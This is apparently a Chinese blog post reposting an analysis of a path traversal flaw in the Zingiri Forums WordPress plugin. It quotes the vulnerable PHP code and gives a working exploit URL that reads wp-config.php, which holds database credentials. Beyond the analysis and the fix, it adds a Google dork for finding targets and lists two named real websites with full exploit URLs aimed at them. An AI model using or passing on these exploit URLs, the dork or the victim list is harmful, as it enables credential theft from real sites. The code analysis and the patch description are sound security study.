WordPress Forums插件'url'参数任意文件泄露漏洞的利用
参考:
WordPress Zingiri Forums arbitrary file disclosure
http://ceriksen.com/2013/01/12/wordpress-zingiri-forums-arbitrary-file-disclosure/
Secunia Advisory SA50833
http://secunia.com/advisories/50833/
Analysis of vulnerability
The Zingiri Web Forums for WordPress writes our a header for the forum in forum.php through adding an action to wp_head.
44 add_action('wp_head','zing_forum_header');
686 function zing_forum_header()
687 {
688 global $zing_forum_content;
689 global $zing_forum_menu;
690 $output=zing_forum_output("content");
691
692 zing_integrator_cut($output,'<div id="footer">','</div>'); //remove footer
693 zing_integrator_cut($output,'<span class="forgot_password">','</span>');
694
695 $zing_forum_content=$output;
696
697 echo '<script type="text/javascript" language="javascript">';
698 echo "var zing_forum_url='".ZING_FORUM_URL."ajax/';";
699 echo "var zing_forum_index='".get_option('home')."/index.php?';";
700 echo "function zing_forum_url_ajax(s) { return zing_forum_url+s; }";
701 echo '</script>';
702
703 echo '<link rel="stylesheet" type="text/css" href="' . ZING_FORUM_URL . 'zing.css" media="screen" />';
704 }
So on each load of the WordPress blog it will call into zing_forum_header. The first call it makes it into zing_forum_output, which is rather long. I’ve highlighted two areas:
456 function zing_forum_output($process) {
457 global $post,$wpdb,$zing_forum_loaded,$zing_forum_to_include,$zing_forum_mode;
458
459 $postVar=array();
460 switch ($process)
461 {
462 case "content":
463 if (isset($post)) $cf=get_post_custom($post->ID);
464 if (isset($_GET['zforum']))
465 {
466 $zing_forum_to_include=$_GET['zforum'];
467 $zing_forum_mode="forum";
468 }
We can affect the value of $zing_forum_to_include through the zforum GET variable. This is then used in a big else if statement. Here is the block of code that is executed if we set that to css:
541 } elseif ($zing_forum_to_include=='css') {
542 ob_end_clean();
543 if (isset($_GET['stylesheet'])) $key=$_GET['stylesheet'];
544 else $key=$_GET['url'];
545 if (isset($_SESSION['ccforum']['stylesheet'][$key])) {
546 $output=$_SESSION['ccforum']['stylesheet'][$key];
547 } else {
548 if (isset($_GET['stylesheet'])) {
549 $http=zing_forum_http("mybb",'css.php',"");
550 $news = new zHttpRequest($http,'zingiri-forum');
551 if (!$news->curlInstalled()) return "cURL not installed";
552 elseif (!$news->live()) return "A HTTP Error occured";
553 $output=$news->DownloadToString();
554 $output=str_replace('url(images/','url('.ZING_MYBB_URL.'/images/',$output);
555
556 } elseif ($_GET['url']) {
557 $url=$_GET['url'];
558 $output=file_get_contents(ZING_MYBB_DIR.'/cache/themes/'.$url);
559 }
560 $f[]='/^body.*{(.*?)/';
561 $r[]=' {$1';
562 $f[]='/.zingbody/';
563 $r[]='';
564 $f[]='/(.*?).{(.*?)/';
565 $r[]='.ccforum $1 {$2';
566 $f[]='/(.*?),(.*?).{(.*?)/';
567 $r[]='$1,.ccforum $2 {$3';
568 $f[]='/(.*?),(.*?),(.*?).{(.*?)/';
569 $r[]='$1,$2,.ccforum $3 {$4';
570 $output=preg_replace($f,$r,$output,-1,$count);
571 if ($output) $_SESSION['ccforum']['stylesheet'][$key]=$output;
572 }
573 header("Content-type: text/css");
574 echo $output;
575 die();
If we don’t set anything expect the “url” get variable, we can cause it to be fed into the file_get_contents call on line 554. We can abuse this to disclose the contents of the wp-config.php file like this:
http://URL/wordpress/?zforum=css&url=../../../../../../wp-config.php
谷歌:inurl:plugins/zingiri-forum
躺枪列表:
http://themakeupmorgue.com/?zforum=css&url=../../../../../../wp-config.php
http://www.4newdesign.com/?zforum=css&url=../../../../../../wp-config.php
修复手法:
1.4.2版对比1.4.4版
557 $url=$_GET['url'];
修改为
555 $url=str_replace('..','',$_GET['url']);
过滤了“..”,不让跳上层目录。